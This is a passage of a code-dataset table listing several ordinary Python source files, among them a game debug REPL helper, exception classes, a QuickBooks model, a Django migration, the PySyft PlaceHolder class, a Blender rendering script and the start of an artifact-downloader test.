max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
python/wotdbg.py | wanyancan/wot-debugserver | 32 | 11000 | import os.path
import tcprepl
import BigWorld
def echo(s):
'''Send string to client'''
if tcprepl.write_client is not None:
tcprepl.write_client(s)
def exec_file(filename, exec_globals=None):
'''
Execute file
Try to find file named `filename` and execute it. If `exec_globals` is
specified it is used as globals-dict in exec context.
'''
if exec_globals is None:
exec_globals = {}
if not os.path.isfile(filename):
filename = BigWorld.wg_resolveFileName(filename)
with open(filename, 'r') as f:
code = f.read()
exec code in exec_globals
| 2.875 | 3 |
quicken/_internal/__init__.py | chrahunt/quicken | 3 | 11001 | <gh_stars>1-10
class QuickenError(Exception):
pass
| 1.039063 | 1 |
folderikon/exceptions.py | demberto/FolderIkon | 1 | 11002 | """Exception which are not actually thrown, only their docstrings are used."""
import colorama
import sys
__all__ = [
"Error",
"ParentIsNotAFolderError",
"InvalidURLError",
"ImageFormatNotSupportedError",
"ImageNotSpecifiedError",
"FolderIconAlreadyExistsError",
"DesktopIniError",
"exception_exit",
]
class Error(Exception):
"""Base class for all FolderIkon errors."""
color = False
def __repr__(self):
return self.red(self.__doc__)
@staticmethod
def red(string):
if Error.color:
return colorama.Fore.RED + string
return string
class ParentIsNotAFolderError(Error):
"""Argument passed to --parent is not a folder."""
class InvalidURLError(Error):
"""Invalid image URL"""
def __init__(self, url):
self.__url = url
super().__init__()
def __repr__(self):
return super().__repr__() + " " + self.__url
class ImageFormatNotSupportedError(Error):
def __init__(self, fmt):
self.__fmt = fmt
super().__init__()
def __repr__(self):
return f"Image format {self.red(self.__fmt)} is not supported. Only ICO, JPG and PNG are supported."
class ImageNotSpecifiedError(Error):
"""An image with a supported format could not be found in this directory."""
class FolderIconAlreadyExistsError(Error):
"""Folder icon already exists."""
class DesktopIniError(Error):
"""The 'desktop.ini' file could not be parsed. Delete it and try again."""
def __init__(self, exc):
self.__exc = exc
super().__init__()
def __repr__(self):
exc_name = self.__exc.__class__.__name__
exc_info = f"An exception of {exc_name} occured when parsing it."
return super().__repr__() + " " + exc_info
def exception_exit(exc):
print(repr(exc()))
sys.exit(-1)
| 2.78125 | 3 |
quickbooks/objects/companycurrency.py | varunbheemaiah/python-quickbooks | 234 | 11003 | <gh_stars>100-1000
from six import python_2_unicode_compatible
from .base import QuickbooksManagedObject, QuickbooksTransactionEntity, Ref, CustomField, MetaData
@python_2_unicode_compatible
class CompanyCurrency(QuickbooksManagedObject, QuickbooksTransactionEntity):
"""
QBO definition: Applicable only for those companies that enable multicurrency, a companycurrency object
defines a currency that is active in the QuickBooks Online company. One or more companycurrency objects
are active based on the company's multicurrency business requirements and correspond to the list
displayed by the Currency Center in the QuickBooks Online UI
"""
class_dict = {
"CustomField": CustomField,
"MetaData": MetaData,
}
qbo_object_name = "CompanyCurrency"
def __init__(self):
super(CompanyCurrency, self).__init__()
self.Id = None
self.Code = ""
self.Name = ""
self.Active = True
self.CustomField = None
self.MetaData = None
def __str__(self):
return self.Name
def to_ref(self):
ref = Ref()
ref.name = self.Name
ref.type = self.qbo_object_name
ref.value = self.Id
return ref
| 2.5625 | 3 |
books/migrations/0004_alter_book_category.py | MwinyiMoha/books-service | 0 | 11004 | # Generated by Django 3.2 on 2021-04-10 12:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("books", "0003_auto_20210410_1231")]
operations = [
migrations.AlterField(
model_name="book",
name="category",
field=models.CharField(
choices=[
("fiction", "Fiction"),
("regular", "Regular"),
("novel", "Novel"),
],
default="regular",
max_length=7,
),
)
]
| 1.71875 | 2 |
syft/execution/placeholder.py | juharris/PySyft | 0 | 11005 | <reponame>juharris/PySyft
from itertools import zip_longest
import syft
from syft.generic.frameworks.hook import hook_args
from syft.generic.abstract.tensor import AbstractTensor
from syft.workers.abstract import AbstractWorker
from syft_proto.execution.v1.placeholder_pb2 import Placeholder as PlaceholderPB
class PlaceHolder(AbstractTensor):
def __init__(
self,
role=None,
tracing=False,
id=None,
tags: set = None,
description: str = None,
shape=None,
expected_dtype=None,
):
"""A PlaceHolder acts as a tensor but does nothing special. It can get
"instantiated" when a real tensor is appended as a child attribute. It
will send forward all the commands it receives to its child tensor.
When you send a PlaceHolder, you don't sent the instantiated tensors.
Args:
id: An optional string or integer id of the PlaceHolder.
"""
super().__init__(id=id, tags=tags, description=description)
if not isinstance(self.id, syft.execution.placeholder_id.PlaceholderId):
self.id = syft.execution.placeholder_id.PlaceholderId(self.id)
self.expected_shape = tuple(shape) if shape is not None else None
self.expected_dtype = expected_dtype
self.child = None
self.role = role
self.tracing = tracing
def get_class_attributes(self):
"""
Specify all the attributes need to build a wrapper correctly when returning a response.
"""
return {"role": self.role, "tracing": self.tracing}
@classmethod
def handle_func_command(cls, command):
""" Receive an instruction for a function to be applied on a Placeholder,
Replace in the args with their child attribute, forward the command
instruction to the handle_function_command of the type of the child attributes,
get the response and wrap it in a Placeholder.
We use this method to perform the tracing.
Args:
command: instruction of a function command: (command name,
<no self>, arguments[, kwargs])
Returns:
the response of the function command
"""
cmd, _, args, kwargs = command
# Replace all PlaceHolders with their child attribute
new_args, new_kwargs, new_type = hook_args.unwrap_args_from_function(cmd, args, kwargs)
# build the new command
new_command = (cmd, None, new_args, new_kwargs)
# Send it to the appropriate class and get the response
response = new_type.handle_func_command(new_command)
# Find first placeholder in args
template_placeholder = None
for arg in args:
if isinstance(arg, PlaceHolder):
template_placeholder = arg
placeholders = PlaceHolder.convert_to_placeholders(response, template_placeholder)
if template_placeholder.tracing:
template_placeholder.role.register_action(
(command, placeholders), syft.execution.computation.ComputationAction
)
return placeholders
@staticmethod
def convert_to_placeholders(response, template_placeholder):
""" Turn back response to PlaceHolders """
if isinstance(response, (tuple, list)):
placeholders = tuple(
PlaceHolder.create_from(
r, role=template_placeholder.role, tracing=template_placeholder.tracing
)
for r in response
)
else:
placeholders = PlaceHolder.create_from(
response, role=template_placeholder.role, tracing=template_placeholder.tracing
)
return placeholders
def __getattribute__(self, name):
"""Try to find the attribute in the current object
and in case we can not then we forward it to the child
"""
try:
response = object.__getattribute__(self, name)
except AttributeError:
child = object.__getattribute__(self, "child")
response = getattr(child, name)
return response
def instantiate(self, tensor):
"""
Add a tensor as a child attribute. All operations on the placeholder will be also
executed on this child tensor.
We remove Placeholders if is there are any.
"""
if isinstance(tensor, PlaceHolder):
self.child = tensor.child
else:
self.child = tensor
if hasattr(self.child, "shape"):
self.expected_shape = tuple(self.child.shape)
if hasattr(self.child, "dtype"):
self.expected_dtype = self.child.dtype
return self
def __str__(self) -> str:
"""
Compact representation of a Placeholder, including tags and optional child
"""
tags = " ".join(list(self.tags or []))
out = f"{type(self).__name__ }[Id:{self.id.value}]"
if hasattr(self, "child") and self.child is not None:
out += f">{self.child}"
return out
__repr__ = __str__
def send(self, *args, **kwargs):
"""
calls move on child & register_action to role
"""
response = self.child.send(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("send", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def move(self, *args, **kwargs):
"""
calls move on a pointer tensor & register_action to role
"""
response = self.child.move(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("move", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def share(self, *args, **kwargs):
"""
Send a command to remote worker to additively share a tensor via pointer tensor
"""
response = self.child.share(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("share", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def fix_prec(self, *args, **kwargs):
"""
sends command to remote worker to transform a tensor to fix_precision via pointer tensor
"""
response = self.child.fix_prec(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("fix_prec", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.computation.ComputationAction
)
return placeholder
def mid_get(self, *args, **kwargs):
response = self.child.mid_get(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(self.child, self)
command = ("mid_get", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def remote_get(self, *args, **kwargs):
"""
calls remote_get on child & register_action to role
"""
response = self.child.remote_get(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("remote_get", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def remote_send(self, *args, **kwargs):
"""
calls remote_send on child & register_action to role
"""
response = self.child.remote_send(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("remote_send", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def share_(self, *args, **kwargs):
"""
calls share_ on child & register_action to role
"""
response = self.child.share_(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("share_", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def get(self, *args, **kwargs):
"""Requests the tensor/chain being pointed to, be serialized and return via child"""
response = self.child.get(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("get", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def copy(self):
"""
Copying a placeholder doesn't duplicate the child attribute, because all
copy operations happen locally where we want to keep reference to the same
instantiated object. As the child doesn't get sent, this is not an issue.
"""
placeholder = PlaceHolder(
role=self.role,
tracing=self.tracing,
tags=self.tags,
shape=self.expected_shape,
expected_dtype=self.expected_dtype,
)
placeholder.child = self.child
if self.tracing:
command = ("copy", self, (), {}), placeholder
self.role.register_action(command, syft.execution.computation.ComputationAction)
return placeholder
@staticmethod
def create_from(tensor, role=None, tracing=False):
""" Helper method to create a placeholder already
instantiated with tensor.
"""
return PlaceHolder(role=role, tracing=tracing).instantiate(tensor)
@staticmethod
def insert(tensor, after, role=None, tracing=False):
""" Helper method to add a placeholder in the specific place of tensor chain. """
current_level = tensor
while not isinstance(current_level, after) and current_level is not None:
current_level = getattr(current_level, "child", None)
if current_level is None:
raise RuntimeError(
f"Cannot insert Placeholder, chain does not contain {after.__name__} tensor type."
)
child = getattr(current_level, "child", None)
if child is None:
raise RuntimeError(
f"Cannot insert Placeholder, {after.__name__} does not wrap anything."
)
placeholder = PlaceHolder.create_from(child, role, tracing)
current_level.child = placeholder
return placeholder
@staticmethod
def extract(tensor):
""" Helper method to find and return placeholder in the tensor chain. """
current_level = tensor
while not isinstance(current_level, PlaceHolder) and current_level is not None:
current_level = getattr(current_level, "child", None)
return current_level
@staticmethod
def create_placeholders(args_shape, args_dtypes=()):
""" Helper method to create a list of placeholders with shapes
in args_shape.
"""
# In order to support -1 value in shape to indicate any dimension
# we map -1 to 1 for shape dimensions.
# TODO: A more complex strategy could be used
mapped_shapes = []
for shape in args_shape:
if list(filter(lambda x: x < -1, shape)):
raise ValueError(f"Invalid shape {shape}")
mapped_shapes.append(tuple(map(lambda y: 1 if y == -1 else y, shape)))
return [
syft.framework.hook.create_zeros(shape, dtype=dtype, requires_grad=False)
for shape, dtype in zip_longest(mapped_shapes, args_dtypes)
]
@staticmethod
def instantiate_placeholders(obj, response):
"""
Utility function to instantiate recursively an object containing placeholders
with a similar object but containing tensors
"""
if obj is not None:
if isinstance(obj, PlaceHolder):
obj.instantiate(response)
elif isinstance(obj, (list, tuple)):
for ph, rep in zip(obj, response):
PlaceHolder.instantiate_placeholders(ph, rep)
else:
raise ValueError(
f"Response of type {type(response)} is not supported in "
"Placeholder.instantiate."
)
@staticmethod
def simplify(worker: AbstractWorker, placeholder: "PlaceHolder") -> tuple:
"""Takes the attributes of a PlaceHolder and saves them in a tuple.
Args:
worker: the worker doing the serialization
placeholder: a PlaceHolder.
Returns:
tuple: a tuple holding the unique attributes of the PlaceHolder.
"""
return (
syft.serde.msgpack.serde._simplify(worker, placeholder.id),
syft.serde.msgpack.serde._simplify(worker, placeholder.tags),
syft.serde.msgpack.serde._simplify(worker, placeholder.description),
syft.serde.msgpack.serde._simplify(worker, placeholder.expected_shape),
)
@staticmethod
def detail(worker: AbstractWorker, tensor_tuple: tuple) -> "PlaceHolder":
"""
This function reconstructs a PlaceHolder given it's attributes in form of a tuple.
Args:
worker: the worker doing the deserialization
tensor_tuple: a tuple holding the attributes of the PlaceHolder
Returns:
PlaceHolder: a PlaceHolder
"""
tensor_id, tags, description, shape = tensor_tuple
tensor_id = syft.serde.msgpack.serde._detail(worker, tensor_id)
tags = syft.serde.msgpack.serde._detail(worker, tags)
description = syft.serde.msgpack.serde._detail(worker, description)
shape = syft.serde.msgpack.serde._detail(worker, shape)
return PlaceHolder(id=tensor_id, tags=tags, description=description, shape=shape)
@staticmethod
def bufferize(worker: AbstractWorker, placeholder: "PlaceHolder") -> PlaceholderPB:
"""Takes the attributes of a PlaceHolder and saves them in a Protobuf message.
Args:
worker: the worker doing the serialization
placeholder: a PlaceHolder.
Returns:
PlaceholderPB: a Protobuf message holding the unique attributes of the PlaceHolder.
"""
protobuf_placeholder = PlaceholderPB()
syft.serde.protobuf.proto.set_protobuf_id(protobuf_placeholder.id, placeholder.id.value)
protobuf_placeholder.tags.extend(placeholder.tags)
if placeholder.description:
protobuf_placeholder.description = placeholder.description
if placeholder.expected_shape:
protobuf_placeholder.expected_shape.dims.extend(placeholder.expected_shape)
return protobuf_placeholder
@staticmethod
def unbufferize(worker: AbstractWorker, protobuf_placeholder: PlaceholderPB) -> "PlaceHolder":
"""
This function reconstructs a PlaceHolder given it's attributes in form of a
Protobuf message.
Args:
worker: the worker doing the deserialization
protobuf_placeholder: a Protobuf message holding the attributes of the PlaceHolder
Returns:
PlaceHolder: a PlaceHolder
"""
tensor_id = syft.serde.protobuf.proto.get_protobuf_id(protobuf_placeholder.id)
tags = set(protobuf_placeholder.tags)
description = None
if bool(protobuf_placeholder.description):
description = protobuf_placeholder.description
expected_shape = tuple(protobuf_placeholder.expected_shape.dims) or None
return PlaceHolder(id=tensor_id, tags=tags, description=description, shape=expected_shape)
@staticmethod
def get_protobuf_schema() -> PlaceholderPB:
return PlaceholderPB
### Register the tensor with hook_args.py ###
hook_args.default_register_tensor(PlaceHolder)
| 2.0625 | 2 |
creativeflow/blender/render_main.py | idaho777/creativeflow | 53 | 11006 | """
MAIN STYLING AND RENDERING FILE
Requirements:
------------------------------------------------------------------------------
IMPORTANT! This has only been tested with Blender 2.79 API. We have run this
on Linux and MacOS.
Execution:
------------------------------------------------------------------------------
This script is intended to run inside blender launched in background mode.
Sample invocation is:
blender --background --factory-startup --python-exit-code 1 PATH_TO_MY_BLEND.blend \
--python blender/render_main.py -- \
--width=500 <ANY OTHER PYTHON FLAGS FROM render_main.py>
'--factory-startup' is used to prevent custom settings from interfering.
'--python-exit-code 1' makes blender exit with code 1 if this script throws an error
'--' causes blender to ignore all following arguments so python can use them.
See blender --help for details. See pipeline.sh for sample usage.
Capabilities:
------------------------------------------------------------------------------
It is assumed that blender is invoked with a single blend. This script is a
jack-of-all-trades for setting up camera, lighting, styling, and rendering for
a custom stylized animation benchmark. We found it easier to run the script
separately for each phase of data processing (see pipeline.sh),
as this way the output can be easily examined for problems after every stage.
However, one-shot execution should also be possible.
See flags below for full capabilities. The trickiest bit is: different metadata
only works with particular render engine option. The script will raise errors
if incorrect engine is specified:
- Vertex paint for correspondences - blender render (no gamma correction!)
- Normals in camera space - blender render (no gamma correction!)
- Flow vector pass - cycles (blender render is buggy)
- Red stylit reference material - cycles
- Env lighting for mixamo models - blender render only
"""
import bpy
import argparse
import logging
import os
import random
import sys
import time
import traceback
# Add to path to make sure we can import modules while running inside Blender.
__sdir = os.path.dirname(os.path.realpath(__file__))
if __sdir not in sys.path:
sys.path.append(__sdir)
import color_util
import geo_util
import io_util
import render_util
import stylit_util
LOG = logging.getLogger(__name__)
if __name__ == "__main__":
try:
# FLAGS
# --------------------------------------------------------------------------
parser = argparse.ArgumentParser(
description='Configurable utility to modify blend and/or render images/flow/metadata.')
parser.add_argument(
'--random_seed', action='store', type=int, default=-1,
help='Integer seed for random number generator; used if > 0.')
# Rendering ----------------------------------------------------------------
parser.add_argument(
'--width', action='store', type=int, default=1500,
help='Width to render at.')
parser.add_argument(
'--height', action='store', type=int, default=1500,
help='Height to render at.')
parser.add_argument(
'--quality_samples', action='store', type=int, default=-1,
help='If positive and using cycles, will use this many samples per pixel; ' +
'e.g. 128 is slow, 10 is comparatively fast.')
parser.add_argument(
'--start_frame', action='store', type=int, default=0,
help='Frame to start rendering at (relative to first frame).')
parser.add_argument(
'--rendered_frames', action='store', type=int, default=0,
help='Maximum frames to render; 0 for none; -1 for all.')
parser.add_argument(
'--skip_existing_frames', action='store_true', default=False,
help='If true, skips existing frames matching --frame_output_prefix.')
parser.add_argument(
'--use_cycles', action='store_true', default=False,
help='If true, sets Cycles as the rendering engine, else leaves unchanged.')
parser.add_argument(
'--use_blender_render', action='store_true', default=False,
help='If true, sets Blender Render as the rendering engine, else leaves unchanged.')
# Outputs ------------------------------------------------------------------
parser.add_argument(
'--frame_output_prefix', action='store', type=str, default='',
help='If set, will set image output to <frame_output_prefix><frame#>.PNG; ' +
'should include full path.')
parser.add_argument(
'--render_metadata_exr', action='store_true', default=False,
help='If true, renders all metadata passes as a multilayer EXR file.')
parser.add_argument(
'--objectids_key_file', action='store', type=str, default='',
help='Directory to write objectids to, as images.')
parser.add_argument(
'--world_normals_output_dir', action='store', type=str, default='',
help='Directory to write world space normals to, as images ' +
'(only compatible with --use_cycles.')
parser.add_argument(
'--camera_normals_output_dir', action='store', type=str, default='',
help='Directory to write camera space normals to, as images ' +
'(only compatible with --use_blender_render.')
parser.add_argument(
'--enable_gamma_correction', action='store_true', default=False,
help='We disable gamma correction by default, as it corrupts the ' +
'metadata rendering; set this on to enable.')
parser.add_argument(
'--bg_name', action='store', type=str, default="STYMO_BG",
help='If any object name matches this substring, it will be treated as ' +
'background for the purpose of id labeling and stylit rendering.')
parser.add_argument(
'--output_blend', action='store', type=str, default='',
help='If set, will output modified blend here (must be absolute path); ' +
'if setting linestyle and/or material, will replace special substrings ' +
'<M> and <L> with material and linestyle.')
parser.add_argument(
'--info_file', action='store', type=str, default='',
help='If set, may output auxiliary information into this file.')
# Camera -------------------------------------------------------------------
parser.add_argument(
'--set_camera', action='store', type=int, default=0,
help='If >= 0, selects ith camera and deletes all other cameras; ' +
'if i > num cameras, generates a random one instead.')
parser.add_argument(
'--keep_extra_cameras', action='store_true',
help='If --set_camera, will not delete extra cameras.')
parser.add_argument(
'--add_random_camera_motion', action='store_true',
help='If generating a random camera and this is true, creates zoom/flyaround/pan; '
'WARNING: parameters are tuned for mixamo character blends.')
# Animation range ----------------------------------------------------------
parser.add_argument(
'--offset_scene_start_frame_by', action='store', type=int, default=0,
help='Unlike --start_frame, which just controls the rendering range, this ' +
'flag offsets the current scene start frame in the timeline by the ' +
'specified amount. Relevant to blends that do not begin at frame 0.')
parser.add_argument(
'--offset_scene_end_frame_by', action='store', type=int, default=0,
help='Unlike --rendered_frames, which just controls the rendering range, this ' +
'flag offsets the current scene end frame in the timeline by the ' +
'specified amount. Relevant to blends that do not begin at frame 0.')
# Lighting -----------------------------------------------------------------
parser.add_argument(
'--set_env_lighting_image', action='store', type=str, default='',
help='Set to image path or directory of environment map images to set ' +
'environment lighting; only works with --use_blender_render.')
parser.add_argument(
'--set_stylit_lighting', action='store_true',
help='If true, sets consistent lighting to render input for stylit.')
# Styles -------------------------------------------------------------------
parser.add_argument(
'--set_stylit_style', action='store_true',
help='If true, sets red material style used for stylit style transfer.')
parser.add_argument(
'--set_corresp_style', action='store_true',
help='If true, will set per-vertex materials to render correspondences.')
parser.add_argument(
'--set_objectids_style', action='store_true',
help='If true, will set objectids to render using flat materials.')
parser.add_argument(
'--deterministic_objectid_colors', action='store_true',
help='If true, objectid colors will not be shuffled; use for testing.')
parser.add_argument(
'--linestyles_blend', action='store', type=str, default='',
help='Path to blend containing all the line styles.')
parser.add_argument(
'--set_linestyle_matching', action='store', type=str, default='',
help='Regex matching linestyle(s) in --line_styles_blend; '
'if more than one match, picks random one; '
'"" for none; ".*" for all; "hi|bye" to match either.')
parser.add_argument(
'--randomize_line_color', action='store_true',
help='If true, randomizes line color if line is set.')
parser.add_argument(
'--materials_blend', action='store', type=str, default='',
help='Path to blend containing all the material styles (e.g. textured blender styles).')
parser.add_argument(
'--set_materials_matching', action='store', type=str, default='',
help='Regex matching materials(s) in --materials_blend; '
'if more than one match, picks random one; '
'"" for none; ".*" for all; "hi|bye" to match either.')
parser.add_argument(
'--randomize_material_color', action='store_true',
help='If true, randomizes material color if material is set.')
# Custom color control
parser.add_argument(
'--material_color_choices', action='store', type=str, default='',
help='String of format R,G,B R2,G2,B2 ... of colors to choose from if ' +
'randomizing material colors.')
parser.add_argument(
'--line_hue_range', action='store', type=str, default='0,1.0',
help='If --randomize_line_color, will keep HSV Hue in this range (two numbers,csv).')
parser.add_argument(
'--line_sat_range', action='store', type=str, default='0,1.0',
help='If --randomize_line_color, will keep HSV Saturation in this range (two numbers,csv).')
parser.add_argument(
'--line_value_range', action='store', type=str, default='0,1.0',
help='If --randomize_line_color, will keep HSV Value in this range (two numbers,csv).')
# Parse only arguments after --
# --------------------------------------------------------------------------
argv = sys.argv
if "--" not in argv:
argv = [] # as if no args are passed
else:
argv = argv[argv.index("--") + 1:]
args = parser.parse_args(argv)
if args.random_seed > 0:
print('Using --random_seed=%d as random seed.' % args.random_seed)
random.seed(args.random_seed)
else:
print('Using time as random seed.')
random.seed(time.time())
render_util.print_blend_diagnostics()
# Handle camera ------------------------------------------------------------
if args.set_camera >= 0:
cam = None
if args.keep_extra_cameras:
cam = geo_util.get_camera_by_number(args.set_camera)
else:
cam = geo_util.delete_all_but_one_camera(args.set_camera)
if cam is None:
print('Generating a random camera.')
bbox = geo_util.get_scene_bbox()
cam = geo_util.create_random_camera(bbox, 2.5, 2.5, 2.5)
if args.add_random_camera_motion:
print('Adding motion to camera.')
geo_util.mixamo_add_random_camera_motion(cam)
geo_util.disable_camera_depth_of_field(cam)
else:
cam = geo_util.get_single_camera_or_die()
# Set active camera
bpy.context.scene.camera = cam
# Handle frame bounds ------------------------------------------------------
orig_start = bpy.context.scene.frame_start
bpy.context.scene.frame_start = orig_start + args.offset_scene_start_frame_by
if args.offset_scene_end_frame_by > 0:
bpy.context.scene.frame_end = orig_start + args.offset_scene_end_frame_by
# Handle lighting ----------------------------------------------------------
info_file = None
if args.info_file:
info_file = open(args.info_file, 'w')
if len(args.set_env_lighting_image) > 0:
if not args.use_blender_render:
raise RuntimeError(
'Error: --set_env_lighting_image="img" only works with --use_blender_render')
render_util.setup_realistic_lighting(args.set_env_lighting_image, 10.0, False)
if args.set_stylit_lighting:
if not args.use_cycles:
raise RuntimeError(
'Error: --set_stylit_lighting only works with --use_cycles')
stylit_util.setup_stylit_lighting()
# Handle styles ------------------------------------------------------------
nstyles = len([x for x in [args.set_stylit_lighting,
args.set_corresp_style, args.set_objectids_style,
(args.set_linestyle_matching or args.set_materials_matching)]
if x])
if nstyles > 1:
raise RuntimeError(
'Error: incompatible rendering styles specified; only one of these can be true: ' +
'--set_stylit_lighting OR ' +
'--set_corresp_style OR --set_objectids_style OR ' +
'(--set_linestyle_matching and/or --set_materials_matching)')
linestyle_name = 'default'
material_name = 'default'
if args.set_stylit_style: # Red material used for stylit rendering
if not args.use_cycles:
raise RuntimeError(
'Error: --set_stylit_style only works with --use_cycles')
render_util.clear_unnecessary_settings()
stylit_util.setup_stylit_materials(bg_name=args.bg_name)
elif args.set_corresp_style: # Per-vertex correspondence rendering
if not args.use_blender_render:
raise RuntimeError(
'Correspondence rendering (--set_corresp_style) only implemented for ' +
'--use_blender_render')
render_util.clear_unnecessary_settings()
render_util.set_correspondence_style()
elif args.set_objectids_style: # Object Ids rendered in flat color
if not args.use_blender_render:
raise RuntimeError(
'Correspondence rendering (--set_objectids_style) only implemented for ' +
'--use_blender_render')
render_util.clear_unnecessary_settings()
idsinfo = render_util.set_objectids_style(
bg_name=args.bg_name, deterministic=args.deterministic_objectid_colors)
if idsinfo and args.objectids_key_file:
with open(os.path.join(args.objectids_key_file), 'w') as f:
for i in range(len(idsinfo)):
f.write('%s %d %d %d\n' %
(idsinfo[i][0], idsinfo[i][1][0],
idsinfo[i][1][1], idsinfo[i][1][2]))
elif args.set_linestyle_matching or args.set_materials_matching: # Freestyle / toon shading
if not args.use_blender_render:
raise RuntimeError(
'Linestyles and materials only implemented for --use_blender_render')
render_util.clear_unnecessary_settings()
if len(args.set_linestyle_matching) > 0:
if len(args.linestyles_blend) == 0:
raise RuntimeError(
'Error: Must set --linestyles_blend with line exemplars ' +
'if requesting --set_linestyle_matching.')
line_color = None
if args.randomize_line_color:
line_color = color_util.get_random_color(
prob_dark=0.8,
bounds=color_util.parse_hsv_bounds(args.line_hue_range,
args.line_sat_range,
args.line_value_range))
linestyle_name = render_util.set_linestyle(
args.linestyles_blend, args.set_linestyle_matching,
color=line_color)
if info_file:
info_file.write('LINESTYLE %s\n' % io_util.strip_blender_name(linestyle_name))
if len(args.set_materials_matching) > 0:
if len(args.materials_blend) == 0:
raise RuntimeError(
'Error: Must set --materials_blend with material ' +
'exemplars if requesting --set_materials_matching.')
mat_color_randomizer = None
if args.randomize_material_color:
if args.material_color_choices:
mat_color_randomizer = color_util.make_color_getter(
args.material_color_choices)
else:
mat_color_randomizer = color_util.make_random_color_getter()
material_name = render_util.set_materials(
args.materials_blend, args.set_materials_matching,
color_randomizer=mat_color_randomizer)
if info_file:
info_file.write('MATSTYLE %s\n' % io_util.strip_blender_name(material_name))
# Handle rendering settings ------------------------------------------------
if args.use_cycles and args.use_blender_render:
raise RuntimeError('Can specify only one of --use_cycles and --use_blender_render')
if args.use_cycles or args.use_blender_render:
nsamples = (args.quality_samples if args.quality_samples > 0 else None)
render_util.set_render_settings(args.use_cycles, nsamples=nsamples,
enable_gamma=args.enable_gamma_correction)
if args.width > 0 and args.height > 0:
render_util.set_width_height(args.width, args.height)
if args.world_normals_output_dir or args.camera_normals_output_dir:
if args.world_normals_output_dir and args.camera_normals_output_dir:
raise RuntimeError('Only one type of normals can be output at once.')
if args.world_normals_output_dir and not args.use_cycles:
raise RuntimeError('World normals can only be output with --use_cycles.')
elif args.camera_normals_output_dir and not args.use_blender_render:
raise RuntimeError('Camera space normals can only be output with --use_blender_render.')
render_util.init_normals_render_nodes(
(args.world_normals_output_dir or args.camera_normals_output_dir),
use_cycles=args.use_cycles)
# Handle saving -------------------------------------------------------
if len(args.output_blend) > 0:
bpy.ops.file.pack_all()
args.output_blend = args.output_blend.replace('<M>', io_util.strip_blender_name(material_name))
args.output_blend = args.output_blend.replace('<L>', io_util.strip_blender_name(linestyle_name))
print('Saving blend to %s' % args.output_blend)
geo_util.save_blend(args.output_blend)
if args.rendered_frames != 0:
if args.render_metadata_exr and not args.use_cycles:
raise RuntimeError('Must set --use_cycles=True to render out flow with ' +
'--render_metadata_exr')
print('Rendering frames')
render_util.render_animation(
args.frame_output_prefix, args.rendered_frames,
start_frame_offset=args.start_frame,
render_exr=args.render_metadata_exr,
skip_existing=args.skip_existing_frames)
except Exception as e:
tb = traceback.format_exc()
LOG.critical(tb)
LOG.critical('Script failed')
raise e
LOG.critical('Script completed')
| 2.03125 | 2 |
atlas/foundations_contrib/src/test/archiving/test_artifact_downloader.py | DeepLearnI/atlas | 296 | 11007 |
from foundations_spec import *
from unittest.mock import call
class TestArtifactDownloader(Spec):
mock_archiver = let_mock()
make_directory_mock = let_patch_mock('os.makedirs')
@let
def source_directory(self):
return self.faker.uri_path()
@let
def download_directory(self):
return self.faker.uri_path()
@let
def artifact_downloader(self):
from foundations_contrib.archiving.artifact_downloader import ArtifactDownloader
return ArtifactDownloader(self.mock_archiver)
@let
def mock_foundations_files(self):
return [
'foundations/a',
'foundations/b',
'foundations_contrib/c',
'foundations_contrib/d',
'foundations_events/e',
'foundations_events/f',
'foundations_internal/g',
'foundations_internal/h',
'jobs/i',
'jobs/j',
'model_serving/k',
'model_serving/l',
'venv/m',
'venv/n',
'docker_image_version.sh',
'download_gui_images.sh',
'foundations_gui.sh',
'foundations_package_manifest.yaml',
'foundations_requirements.txt',
'job.tgz',
'run.env',
'run.sh',
'p.bin',
'q.bin',
'template/t',
'template/u',
]
def test_downloads_single_file_to_specified_directory(self):
self._mock_file_list(['path/to/my/file'])
self.artifact_downloader.download_files('', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_with('path/to/my/file', self.download_directory + '/path/to/my/file')
def test_downloads_multiple_files_to_specified_directory(self):
self._mock_file_list(['different/file', 'other/different/file'])
self.artifact_downloader.download_files('', self.download_directory)
first_file_download = call('different/file', self.download_directory + '/different/file')
second_file_download = call('other/different/file', self.download_directory + '/other/different/file')
self.mock_archiver.fetch_persisted_file.assert_has_calls([first_file_download, second_file_download])
def test_ensures_target_directory_exists(self):
self._mock_file_list(['path/to/my/file'])
self.artifact_downloader.download_files('', self.download_directory)
self.make_directory_mock.assert_called_with(self.download_directory + '/path/to/my', exist_ok=True)
def test_downloads_multiple_files_to_specified_directory(self):
self._mock_file_list(['different/file', 'other/different/file'])
self.artifact_downloader.download_files('', self.download_directory)
first_dirctory_creation = call(self.download_directory + '/different', exist_ok=True)
